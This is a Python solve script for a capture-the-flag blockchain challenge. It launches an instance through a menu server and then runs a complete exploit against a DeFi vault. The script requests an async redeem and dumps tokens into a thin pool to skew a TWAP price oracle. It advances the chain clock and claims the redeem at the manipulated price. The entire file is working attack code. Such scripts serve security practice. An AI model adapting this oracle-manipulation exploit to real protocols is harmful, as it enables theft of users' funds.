#!/usr/bin/env python3
from __future__ import annotations

import argparse
import os
import re
import socket
import sys
import time
from dataclasses import dataclass
from typing import Any

from eth_account import Account
from web3 import Web3


# Launcher menu endpoint: launch_instance() connects here to start an
# instance, and the same connection is later reused by get_flag().
MENU_HOST = "1.95.63.227"
MENU_PORT = 7000
# Largest uint256 value; passed to ERC-20 approve() as an unlimited allowance.
MAX_UINT = 2**256 - 1
# Far-future Unix timestamp (~year 2286) passed as the router calls' final
# argument (presumably the deadline), so those calls effectively never expire.
DEADLINE = 9_999_999_999


# Minimal ABI for the challenge's Setup contract: view getters for the
# addresses of the deployed contracts read in solve(), plus isSolved(),
# which is the win condition checked at the end of the exploit.
SETUP_ABI = [
    {"type": "function", "name": "vault", "inputs": [], "outputs": [{"type": "address"}], "stateMutability": "view"},
    {"type": "function", "name": "oracle", "inputs": [], "outputs": [{"type": "address"}], "stateMutability": "view"},
    {"type": "function", "name": "router", "inputs": [], "outputs": [{"type": "address"}], "stateMutability": "view"},
    {"type": "function", "name": "tokenA", "inputs": [], "outputs": [{"type": "address"}], "stateMutability": "view"},
    {"type": "function", "name": "tokenB", "inputs": [], "outputs": [{"type": "address"}], "stateMutability": "view"},
    {"type": "function", "name": "tokenC", "inputs": [], "outputs": [{"type": "address"}], "stateMutability": "view"},
    {"type": "function", "name": "pairAB", "inputs": [], "outputs": [{"type": "address"}], "stateMutability": "view"},
    {"type": "function", "name": "pairBC", "inputs": [], "outputs": [{"type": "address"}], "stateMutability": "view"},
    {"type": "function", "name": "isSolved", "inputs": [], "outputs": [{"type": "bool"}], "stateMutability": "view"},
]

# Minimal ERC-20 subset used by this script: approve(spender, amount) for
# allowances and balanceOf(owner) for balance checks. It is also bound to the
# A/B pair address to read and approve that pair's LP token.
ERC20_ABI = [
    {"type": "function", "name": "approve", "inputs": [{"type": "address"}, {"type": "uint256"}], "outputs": [{"type": "bool"}], "stateMutability": "nonpayable"},
    {"type": "function", "name": "balanceOf", "inputs": [{"type": "address"}], "outputs": [{"type": "uint256"}], "stateMutability": "view"},
]

# Router subset. The ABI leaves parameters unnamed; the signatures appear to
# mirror Uniswap V2 (assumed, confirm against the challenge router):
#   addLiquidity(tokenA, tokenB, amountADesired, amountBDesired,
#                amountAMin, amountBMin, to, deadline)
#       -> (amountA, amountB, liquidity)
#   swapExactTokensForTokens(amountIn, amountOutMin, path, to, deadline)
#       -> amounts
ROUTER_ABI = [
    {
        "type": "function",
        "name": "addLiquidity",
        "inputs": [
            {"type": "address"},
            {"type": "address"},
            {"type": "uint256"},
            {"type": "uint256"},
            {"type": "uint256"},
            {"type": "uint256"},
            {"type": "address"},
            {"type": "uint256"},
        ],
        "outputs": [{"type": "uint256"}, {"type": "uint256"}, {"type": "uint256"}],
        "stateMutability": "nonpayable",
    },
    {
        "type": "function",
        "name": "swapExactTokensForTokens",
        "inputs": [
            {"type": "uint256"},
            {"type": "uint256"},
            {"type": "address[]"},
            {"type": "address"},
            {"type": "uint256"},
        ],
        "outputs": [{"type": "uint256[]"}],
        "stateMutability": "nonpayable",
    },
]

# Vault subset used by the exploit:
#   deposit(amount, receiver)        -> shares   (LP tokens in, shares out)
#   balanceOf(owner)                 -> share balance
#   pricePerShare() / lpPriceUSD()   -> pricing views (only logged here)
#   requestRedeem(shares, a, b)      -> requestId (step 1 of an async redeem)
#   claimRedeem(requestId)                        (step 2 of an async redeem)
# NOTE(review): the requestRedeem address arguments look like ERC-7540's
# (controller, owner); solve() passes the player for both. Unconfirmed.
VAULT_ABI = [
    {"type": "function", "name": "deposit", "inputs": [{"type": "uint256"}, {"type": "address"}], "outputs": [{"type": "uint256"}], "stateMutability": "nonpayable"},
    {"type": "function", "name": "balanceOf", "inputs": [{"type": "address"}], "outputs": [{"type": "uint256"}], "stateMutability": "view"},
    {"type": "function", "name": "pricePerShare", "inputs": [], "outputs": [{"type": "uint256"}], "stateMutability": "view"},
    {"type": "function", "name": "lpPriceUSD", "inputs": [], "outputs": [{"type": "uint256"}], "stateMutability": "view"},
    {
        "type": "function",
        "name": "requestRedeem",
        "inputs": [{"type": "uint256"}, {"type": "address"}, {"type": "address"}],
        "outputs": [{"type": "uint256"}],
        "stateMutability": "nonpayable",
    },
    {"type": "function", "name": "claimRedeem", "inputs": [{"type": "uint256"}], "outputs": [{"type": "uint256"}], "stateMutability": "nonpayable"},
]

# Oracle subset: a single update(pair) call. solve() invokes it for both the
# A/B and B/C pairs, before and after the price manipulation.
ORACLE_ABI = [
    {"type": "function", "name": "update", "inputs": [{"type": "address"}], "outputs": [], "stateMutability": "nonpayable"},
]


@dataclass
class Instance:
    """Connection details for one challenge instance.

    Built either directly from command-line/environment values or by
    parsing the launcher's text output.
    """

    rpc: str  # HTTP(S) JSON-RPC endpoint of the instance's chain
    private_key: str  # player's private key as a hex string (0x + 64 hex digits when parsed)
    setup: str  # address of the challenge's Setup contract
    sock: socket.socket | None = None  # open launcher-menu socket when launched via the menu, else None


def recv_some(sock: socket.socket, timeout: float = 2.0) -> str:
    """Read from *sock* until it goes quiet or the peer disconnects, then decode.

    The socket's timeout is set to *timeout* and left that way afterwards.
    Reading stops when a single ``recv`` waits longer than *timeout* (no more
    data for now), when the peer closes the connection (``recv`` returns
    ``b""``), or when the peer resets it. In every case, whatever was
    received so far is returned.

    Args:
        sock: Connected socket to read from.
        timeout: Per-``recv`` idle timeout in seconds.

    Returns:
        All received bytes decoded as UTF-8; undecodable bytes become U+FFFD.
    """
    sock.settimeout(timeout)
    chunks: list[bytes] = []
    while True:
        try:
            chunk = sock.recv(8192)
        except socket.timeout:
            break
        except ConnectionResetError:
            # Keep what was already received instead of discarding it; any
            # later send on this socket will surface the broken connection.
            break
        if not chunk:
            break
        chunks.append(chunk)
    # Join once at the end: repeated ``bytes +=`` is quadratic in total size.
    return b"".join(chunks).decode(errors="replace")


def parse_instance(text: str) -> Instance:
    """Extract RPC URL, private key and Setup address from launcher output.

    Each field is found by a case-insensitive regex: a label (e.g. ``RPC``,
    ``RPC URL``, ``Private Key``, ``PK``, ``Setup Address``), then one or more
    of ``:``, ``=``, ``>`` or ``-``, then the value. The RPC value is an
    ``http(s)://`` URL, the key is ``0x`` plus 64 hex digits, and the Setup
    address is ``0x`` plus 40 hex digits.

    Raises:
        RuntimeError: if any of the three fields is missing. The full *text*
            is printed first to help diagnose the launcher's format.
    """
    field_patterns = {
        "rpc": r"(?:RPC(?:\s+(?:URL|Endpoint))?|rpc)\s*[:=>-]+\s*(https?://[^\s]+)",
        "private_key": r"(?:Private Key|PK|private_key)\s*[:=>-]+\s*(0x[a-fA-F0-9]{64})",
        "setup": r"(?:Setup(?:\s+(?:Address|Contract))?|setup)\s*[:=>-]+\s*(0x[a-fA-F0-9]{40})",
    }
    matches = {field: re.search(pattern, text, re.I) for field, pattern in field_patterns.items()}

    if any(match is None for match in matches.values()):
        print(text)
        raise RuntimeError("Could not parse RPC / Private Key / Setup from launcher output")

    return Instance(**{field: match.group(1) for field, match in matches.items()})


def launch_instance(team_token: str) -> Instance:
    """Start a fresh challenge instance through the launcher menu.

    Connects to ``MENU_HOST:MENU_PORT``, selects menu option ``2``, submits
    the stripped *team_token*, and parses the reply with ``parse_instance``.
    All launcher output is echoed to stdout.

    On success the menu socket is left open and stored in the returned
    instance's ``sock`` attribute, so the flag can be requested later on the
    same session. The caller is responsible for closing it. If anything
    fails before the instance is returned, the socket is closed before the
    exception propagates.

    Raises:
        OSError: if the launcher cannot be reached or the connection fails.
        RuntimeError: if the launcher output cannot be parsed.
    """
    sock = socket.create_connection((MENU_HOST, MENU_PORT), timeout=10)
    try:
        banner = recv_some(sock)
        print(banner, end="")
        sock.sendall(b"2\n")
        time.sleep(0.2)
        prompt = recv_some(sock)
        print(prompt, end="")
        sock.sendall((team_token.strip() + "\n").encode())
        # Presumably gives the launcher time to deploy the instance before
        # its reply (with RPC / key / Setup) is drained.
        time.sleep(5)
        output = recv_some(sock, timeout=5)
        print(output, end="")
        instance = parse_instance(output)
    except BaseException:
        # Don't leak the connection when talking to the launcher or parsing
        # its output fails (including Ctrl-C during the sleeps).
        sock.close()
        raise
    instance.sock = sock
    return instance


def get_flag(sock: socket.socket, team_token: str | None) -> str:
    """Ask the launcher menu for the flag (menu option ``3``).

    If the menu replies with a ``"Team token"`` prompt and *team_token* is
    non-empty, the prompt is echoed, the stripped token is sent, and the
    follow-up reply is appended to the returned text.

    Returns:
        All text received from the menu after selecting option 3.
    """
    sock.sendall(b"3\n")
    time.sleep(0.5)
    reply = recv_some(sock, timeout=3)

    needs_token = "Team token" in reply and team_token
    if not needs_token:
        return reply

    print(reply, end="")
    sock.sendall(f"{team_token.strip()}\n".encode())
    time.sleep(2)
    return reply + recv_some(sock, timeout=3)


def contract(w3: Web3, addr: str, abi: list[dict[str, Any]]) -> Any:
    """Return a web3 contract object binding *abi* to *addr* on *w3*.

    *addr* is converted to checksum form first, presumably because web3.py
    rejects non-checksummed addresses. This lets callers pass raw values
    straight from the Setup getters or the command line.
    """
    checksummed = Web3.to_checksum_address(addr)
    return w3.eth.contract(address=checksummed, abi=abi)


def raw_signed_tx(signed: Any) -> bytes:
    """Return the serialized bytes of a signed transaction.

    The result is suitable for ``w3.eth.send_raw_transaction``. Newer
    eth-account releases expose these bytes as ``raw_transaction``; older
    ones use ``rawTransaction``, which was deprecated before being removed.
    The new name is tried first, so versions that still carry both never
    hit the deprecated accessor (and its warning).

    Raises:
        AttributeError: if *signed* has neither attribute (or both are None).
    """
    for attr in ("raw_transaction", "rawTransaction"):
        raw = getattr(signed, attr, None)
        if raw is not None:
            return raw
    raise AttributeError(
        f"{type(signed).__name__} has neither 'raw_transaction' nor 'rawTransaction'"
    )


def send_tx(w3: Web3, acct: Any, fn: Any, label: str) -> Any:
    """Sign and send the contract call *fn* from *acct*, then wait for it.

    Transaction fields:
      * nonce   - the sender's current transaction count;
      * chainId - queried from the node;
      * gas     - node estimate * 1.5 + 50_000, or a flat 5,000,000 (with a
                  printed warning) if estimation raises;
      * gasPrice - ``w3.eth.gas_price``, or 1 if that query raises.

    Args:
        w3: Connected Web3 instance.
        acct: Local account (``eth_account``) that signs the transaction.
        fn: Bound contract function call to execute.
        label: Human-readable name used in log lines and errors.

    Returns:
        The transaction receipt (waits up to 120 seconds for it).

    Raises:
        RuntimeError: if the receipt's status is not 1 (the tx reverted).
    """
    sender = acct.address
    nonce = w3.eth.get_transaction_count(sender)
    chain_id = w3.eth.chain_id

    try:
        estimate = fn.estimate_gas({"from": sender})
    except Exception as exc:
        print(f"[!] gas estimate failed for {label}: {exc}; using 5,000,000")
        gas = 5_000_000
    else:
        # Headroom over the estimate so state changes between estimation and
        # inclusion don't cause an out-of-gas failure.
        gas = int(estimate * 1.5) + 50_000

    try:
        gas_price = w3.eth.gas_price
    except Exception:
        gas_price = 1

    params: dict[str, Any] = {
        "from": sender,
        "nonce": nonce,
        "chainId": chain_id,
        "gas": gas,
        "gasPrice": gas_price,
    }
    signed = acct.sign_transaction(fn.build_transaction(params))
    tx_hash = w3.eth.send_raw_transaction(raw_signed_tx(signed))
    print(f"[*] {label}: {tx_hash.hex()}")

    receipt = w3.eth.wait_for_transaction_receipt(tx_hash, timeout=120)
    if receipt.status == 1:
        return receipt
    raise RuntimeError(f"{label} reverted in tx {tx_hash.hex()}")


def mine_after(w3: Web3, seconds: int) -> None:
    """Advance the chain clock by *seconds* and mine one block.

    Uses the ``evm_increaseTime`` and ``evm_mine`` JSON-RPC methods, which
    are typically only available on development nodes (Anvil, Hardhat,
    Ganache and similar).

    The provider-level ``make_request`` returns the raw JSON-RPC response
    instead of raising on errors. Without the check below, an unsupported or
    failing call would go unnoticed and later steps would run against the
    wrong timestamp.

    Raises:
        RuntimeError: if the node answers either call with a JSON-RPC error.
    """
    for method, params in (("evm_increaseTime", [seconds]), ("evm_mine", [])):
        response = w3.provider.make_request(method, params)
        error = response.get("error") if isinstance(response, dict) else None
        if error:
            raise RuntimeError(f"{method} failed: {error}")


def solve(instance: Instance, lp_amount: int, wait_seconds: int, claim_id_override: int | None) -> bool:
    """Run the exploit against *instance* and report ``Setup.isSolved()``.

    Steps, in order (every transaction waits for its receipt via send_tx):
      1. Connect to the RPC and read every contract address from Setup.
      2. Approve TKA/TKB/TKC to the router, then call addLiquidity for A/B,
         passing *lp_amount* for both token amounts and 0 for both minimums
         (assuming Uniswap-V2 argument order).
      3. Approve and deposit all minted A/B LP into the vault.
      4. Advance the chain clock by 2s and update the oracle for both pairs.
      5. Request an async redeem of all vault shares. The request id is
         predicted with an eth_call first, unless *claim_id_override* is set.
      6. Swap all remaining TKB into the B/C pool, advance the clock by
         *wait_seconds*, and update the oracle for both pairs again.
      7. Claim the redeem request and return ``Setup.isSolved()``.

    NOTE(review): the intended mechanism appears to be that the async redeem
    is priced at claim time from the manipulated oracle/TWAP rather than at
    request time. This is inferred from the log messages, not from the vault
    source; confirm against the challenge contracts.

    Args:
        instance: RPC URL, player private key and Setup address.
        lp_amount: Amount passed for both tokens to addLiquidity.
        wait_seconds: Seconds to advance the chain clock after the swap.
        claim_id_override: Redeem request id to claim. If None, the id is
            predicted via eth_call, and ids 0-4 are tried as fallbacks.

    Returns:
        The value of ``Setup.isSolved()`` after claiming.

    Raises:
        RuntimeError: if the RPC is unreachable, a transaction reverts, no LP
            or vault shares are minted, or no TKB remains to swap.
        Exception: the last claimRedeem failure if every candidate id fails.
    """
    w3 = Web3(Web3.HTTPProvider(instance.rpc, request_kwargs={"timeout": 20}))
    if not w3.is_connected():
        raise RuntimeError(f"RPC not reachable: {instance.rpc}")

    acct = Account.from_key(instance.private_key)
    player = Web3.to_checksum_address(acct.address)
    print(f"[*] player={player}")
    print(f"[*] chain_id={w3.eth.chain_id}")

    # Resolve every challenge contract address from the Setup contract.
    setup = contract(w3, instance.setup, SETUP_ABI)
    vault_addr = setup.functions.vault().call()
    oracle_addr = setup.functions.oracle().call()
    router_addr = setup.functions.router().call()
    token_a = setup.functions.tokenA().call()
    token_b = setup.functions.tokenB().call()
    token_c = setup.functions.tokenC().call()
    pair_ab = setup.functions.pairAB().call()
    pair_bc = setup.functions.pairBC().call()

    for name, addr in [
        ("vault", vault_addr),
        ("oracle", oracle_addr),
        ("router", router_addr),
        ("tokenA", token_a),
        ("tokenB", token_b),
        ("tokenC", token_c),
        ("pairAB", pair_ab),
        ("pairBC", pair_bc),
    ]:
        print(f"[*] {name}={Web3.to_checksum_address(addr)}")

    vault = contract(w3, vault_addr, VAULT_ABI)
    oracle = contract(w3, oracle_addr, ORACLE_ABI)
    router = contract(w3, router_addr, ROUTER_ABI)
    tka = contract(w3, token_a, ERC20_ABI)
    tkb = contract(w3, token_b, ERC20_ABI)
    tkc = contract(w3, token_c, ERC20_ABI)
    # The A/B pair contract is also its LP token, so it is bound with ERC20_ABI.
    lp_ab = contract(w3, pair_ab, ERC20_ABI)

    # Unlimited router allowances for addLiquidity and the later TKB swap.
    # (The TKC approval is not needed by any later call in this function.)
    print("[*] approve tokens to router")
    send_tx(w3, acct, tka.functions.approve(router_addr, MAX_UINT), "approve TKA")
    send_tx(w3, acct, tkb.functions.approve(router_addr, MAX_UINT), "approve TKB")
    send_tx(w3, acct, tkc.functions.approve(router_addr, MAX_UINT), "approve TKC")

    print(f"[*] add liquidity A/B amount={lp_amount}")
    send_tx(
        w3,
        acct,
        router.functions.addLiquidity(token_a, token_b, lp_amount, lp_amount, 0, 0, player, DEADLINE),
        "addLiquidity A/B",
    )

    lp_bal = lp_ab.functions.balanceOf(player).call()
    print(f"[*] player LP={lp_bal}")
    if lp_bal <= 0:
        raise RuntimeError("No A/B LP minted")

    # Deposit the player's whole LP balance into the vault.
    print("[*] deposit LP into vault")
    send_tx(w3, acct, lp_ab.functions.approve(vault_addr, MAX_UINT), "approve LP")
    send_tx(w3, acct, vault.functions.deposit(lp_bal, player), "vault deposit")

    shares = vault.functions.balanceOf(player).call()
    print(f"[*] shares={shares}")
    if shares <= 0:
        raise RuntimeError("No vault shares minted")

    # Advance time, then record a first oracle observation for both pairs.
    # Presumably the oracle needs an earlier observation before it yields a
    # valid price (per the log message below); confirm in the oracle source.
    print("[*] make oracle history valid")
    mine_after(w3, 2)
    send_tx(w3, acct, oracle.functions.update(pair_ab), "oracle update pairAB initial")
    send_tx(w3, acct, oracle.functions.update(pair_bc), "oracle update pairBC initial")

    # Log-only: vault pricing before the manipulation, for comparison.
    pps = vault.functions.pricePerShare().call()
    lp_price_before = vault.functions.lpPriceUSD().call()
    print(f"[*] snapshot pps={pps}")
    print(f"[*] lp price before={lp_price_before}")

    # Predict the request id with an eth_call (.call() does not change
    # state); if the simulation fails, fall back to 0.
    if claim_id_override is None:
        try:
            request_id = vault.functions.requestRedeem(shares, player, player).call({"from": player})
        except Exception as exc:
            print(f"[!] could not pre-call requestRedeem id: {exc}; assuming 0")
            request_id = 0
    else:
        request_id = claim_id_override

    print(f"[*] request async redeem, expected requestId={request_id}")
    send_tx(w3, acct, vault.functions.requestRedeem(shares, player, player), "requestRedeem")

    b_bal = tkb.functions.balanceOf(player).call()
    print(f"[*] remaining TKB={b_bal}")
    if b_bal <= 0:
        raise RuntimeError("No TKB left to dump into B/C pool")

    # Swap the entire remaining TKB balance along path B -> C, with a minimum
    # output of 0, to move the B/C pool price.
    print("[*] dump remaining TKB into thin B/C pool")
    send_tx(
        w3,
        acct,
        router.functions.swapExactTokensForTokens(b_bal, 0, [token_b, token_c], player, DEADLINE),
        "swap TKB->TKC",
    )

    # Let the manipulated price persist for wait_seconds of chain time, then
    # record new oracle observations for both pairs.
    print(f"[*] wait {wait_seconds}s for manipulated TWAP")
    mine_after(w3, wait_seconds)

    print("[*] update oracle observations after manipulation")
    send_tx(w3, acct, oracle.functions.update(pair_ab), "oracle update pairAB after")
    send_tx(w3, acct, oracle.functions.update(pair_bc), "oracle update pairBC after")

    lp_price_after = vault.functions.lpPriceUSD().call()
    print(f"[*] lp price after={lp_price_after}")

    # Try the predicted id first. Without an override, also try ids 0-4 in
    # case the prediction was wrong.
    claim_ids = [int(request_id)]
    if claim_id_override is None:
        claim_ids.extend(i for i in range(5) if i not in claim_ids)

    # Stop at the first successful claim; re-raise the last error only if
    # every candidate id failed.
    last_exc: Exception | None = None
    for claim_id in claim_ids:
        try:
            print(f"[*] claim redeem requestId={claim_id}")
            send_tx(w3, acct, vault.functions.claimRedeem(claim_id), f"claimRedeem {claim_id}")
            last_exc = None
            break
        except Exception as exc:
            print(f"[!] claimRedeem({claim_id}) failed: {exc}")
            last_exc = exc
    if last_exc is not None:
        raise last_exc

    solved = setup.functions.isSolved().call()
    print(f"[*] solved={solved}")
    return bool(solved)


def main() -> int:
    """Command-line entry point: obtain an instance, run the exploit, fetch the flag.

    Instance selection:
      * if ``--rpc``, ``--pk`` and ``--setup`` (or env ``RPC``/``PK``/``SETUP``)
        are all set, that existing instance is used;
      * otherwise, if a team token (``--team-token`` or env ``TEAM_TOKEN``) is
        set, a new instance is launched through the menu;
      * otherwise a usage message is printed to stderr and 2 is returned.

    When the instance came from the launcher and solving succeeds, the flag is
    requested on the same menu connection. That connection is always closed,
    even if solving or fetching the flag raises.

    Returns:
        Process exit code: 0 if solved, 1 if not solved, 2 on missing arguments.
    """
    parser = argparse.ArgumentParser(description="ChronoStasis async redeem exploit")
    parser.add_argument("--team-token", default=os.environ.get("TEAM_TOKEN"), help="launcher team token")
    parser.add_argument("--rpc", default=os.environ.get("RPC"), help="challenge RPC URL")
    parser.add_argument("--pk", default=os.environ.get("PK"), help="player private key")
    parser.add_argument("--setup", default=os.environ.get("SETUP"), help="Setup contract address")
    parser.add_argument("--lp-amount", type=int, default=1000 * 10**18)
    parser.add_argument("--wait", type=int, default=360, help="TWAP manipulation wait time")
    parser.add_argument("--claim-id", type=int, default=None)
    args = parser.parse_args()

    menu_sock: socket.socket | None = None
    team_token = args.team_token

    if args.rpc and args.pk and args.setup:
        instance = Instance(args.rpc, args.pk, args.setup)
    elif team_token:
        instance = launch_instance(team_token)
        menu_sock = instance.sock
    else:
        print("Need either --team-token/TEAM_TOKEN or --rpc --pk --setup", file=sys.stderr)
        return 2

    try:
        solved = solve(instance, args.lp_amount, args.wait, args.claim_id)
        if solved and menu_sock is not None:
            print("[*] requesting flag from menu")
            flag_output = get_flag(menu_sock, team_token)
            print(flag_output, end="")
    finally:
        # Release the launcher connection even when the exploit raises.
        if menu_sock is not None:
            menu_sock.close()
    return 0 if solved else 1


if __name__ == "__main__":
    # Use main()'s return value (0 solved / 1 not solved / 2 bad args) as the
    # process exit status.
    sys.exit(main())
